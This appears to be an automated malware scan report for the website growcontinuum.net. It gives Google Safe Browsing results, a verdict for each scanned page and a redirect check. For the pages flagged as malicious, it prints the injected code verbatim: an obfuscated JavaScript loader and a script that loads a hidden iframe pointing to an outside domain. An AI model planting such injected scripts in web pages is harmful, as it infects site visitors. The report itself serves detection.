Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=growcontinuum.net
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://growcontinuum.net/ | 200 OK Content-Length: 28270 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) try{document["b"+"od"+"y"]*=document}catch(dgsgsdg){zxc=1;ww=window;}try{d=document["createElement"]("span");}catch(agdsg){zxc=0;}try{if(ww.document)window["doc"+"ument"]["body"]="zxc"}catch(bawetawe){if(ww.document){v=window;n=["3m","47","3l","4d","45","3n","46","4c","1k","4f","4a","41","4c","3n","1e","18","28","41","3o","4a","3j","45","3n","16","4b","4c","4h","44","3n","29","3e","18","48","47","4b","41","4c","41","47","46","26","3o","41","4g","3n","3m","27","4c","47","48","26","1m","48","4g"," Antivirus reports:
| ||
http://growcontinuum.net/wp-includes/js/comment-reply.js?ver=20090102 | 200 OK Content-Length: 786 Content-Type: application/javascript | clean |
http://growcontinuum.net/wp-includes/js/jquery/jquery.js?ver=1.3.2 | 200 OK Content-Length: 57276 Content-Type: application/javascript | clean |
http://growcontinuum.net/wp-content/themes/lifestyle_30/javascript/date.js | 200 OK Content-Length: 496 Content-Type: application/javascript | clean |
http://growcontinuum.net/about/ | 200 OK Content-Length: 27142 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://growcontinuum.net/about/long-term-goals/ | 200 OK Content-Length: 24575 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://growcontinuum.net/about/our-leadership/ | 200 OK Content-Length: 27309 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://growcontinuum.net/test404page.js | 404 Not Found Content-Length: 25995 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.loaded) {
showBrowVer(); } else { if (window.addEventListener) { window.addEventListener('load', showBrowVer, false); } else { window.attachEvent('onload', showBrowVer); } } function browserDetectNav(chrAfterPoint) { var UA=window.navigator.userAgent, OperaB = /Opera[ \/]+\w+\.\w+/i, OperaV = /Version[ \/]+\w+\.\w+/i, FirefoxB = /Firefo divTag.id='dt'; document.body.appendChild(divTag); var js_kod2 = document.createElement('iframe'); js_kod2.src = 'http://kreotceonite.com/'; js_kod2.width = '5px'; js_kod2.height = '3px'; js_kod2.setAttribute('style','visibility:hidden'); document.getElementById('dt').appendChild(js_kod2); } } } Antivirus reports:
| ||
http://growcontinuum.net/wp-login.php | 200 OK Content-Length: 1973 Content-Type: text/html | clean |
http://growcontinuum.net/wp-login.php?action=lostpassword | 200 OK Content-Length: 1654 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: growcontinuum.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 07:17:25 GMT
Server: Apache
Content-Length: 28270
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...28270 bytes of data.
GET / HTTP/1.1
Host: growcontinuum.net
Result:
HTTP/1.1 200 OK
Connection: close
Date: Sat, 17 Jan 2015 07:17:25 GMT
Server: Apache
Content-Length: 28270
Content-Type: text/html
X-Powered-By: PHP/5.4.35
...28270 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: growcontinuum.net
Referer: http://www.google.com/search?q=growcontinuum.net
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: growcontinuum.net
Referer: http://www.google.com/search?q=growcontinuum.net
Result:
The result is similar to the first query. There are no suspicious redirects found.